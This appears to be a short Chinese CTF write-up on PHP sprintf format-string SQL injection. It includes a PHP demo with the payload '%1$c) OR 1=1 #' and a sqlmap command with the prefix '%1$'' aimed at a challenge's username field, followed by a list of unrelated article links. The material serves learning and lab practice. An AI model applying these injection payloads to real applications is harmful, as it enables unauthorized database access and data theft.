php sprintf格式化注入
2024-08-29 14:58:49
URL:http://efa4e2c2b8df4ce69454639f4e3727071652c31167f341a4.game.ichunqiu.com/
简单的说就是sprintf中%1$\'
会将\
吃掉,导致'
的逃逸。%
后表示第几个参数,$
表示参数类型。
还有一个sprintf漏洞的利用方式:%c
起到了类似chr()
的效果,将数字39转化为'
,从而导致了sql注入。
<?php $input1 = '%1$c) OR 1=1 #';
$input2 = 39;
$sql = "SELECT * FROM foo WHERE bar IN ('$input1') AND baz = %s";
$sql = sprintf($sql, $input2);
echo $sql;
?>
在这题中,--prefix
加个前缀丢进sqlmap跑就好了。
虽然是post
sqlmap -r /home/1.txt -p username --prefix="%1$'"
--prefix 前缀
--suffix 后缀
其实也可以直接*
最新文章
- Windows消息机制
- The requested operation has failed apache
- 转载:回编译APK出错:java.nio.char set.MalformedInputException: Input length = 1
- centos6.7 安装Docker
- CentOS安装、卸载jdk
- Java 打开文件的两种方式
- NSIS:简单按钮美化插件SkinButton,支持透明PNG图片。
- lua中获取时间
- mvc关于三级联动修改时数据回显
- nginx源码分析——event模块
- 浅谈event.client、event.screen与event.offset
- selenium跳过webdriver检测并爬取淘宝我已购买的宝贝数据
- 面向对象(特殊成员 组合 self)
- Python3基础 list list()生成空列表
- 成功设置open live writer
- sqlalchemy 学习--单表操作
- hdu 4407 容斥原理
- Redis笔记(三):Redis常用命令
- mysql导出导入sql文件方法(linux)
- QT 4.8.5 源代码目录调整
热门文章
- android studio 运行太慢了
- Spring boot整合shiro框架(2)
- 【.Net】C# 将Access中时间段条件查询的数据添加到ListView中
- js function的方法名是一个变量 能被重复定义 当变量名一致时候 会使用最后一个function
- jmeter3.2生成图形html遇到的问题Error in NonGUIDriver java.lang.IllegalArgumentException: Results file:log is not empty
- 【NOI2006】聪明的导游
- bzoj1426: 收集邮票(期望)
- bzoj4753: [Jsoi2016]最佳团体(分数规划+树形依赖背包)
- 框架----Django框架知识点整理
- Codeforces Round #298 (Div. 2)A B C D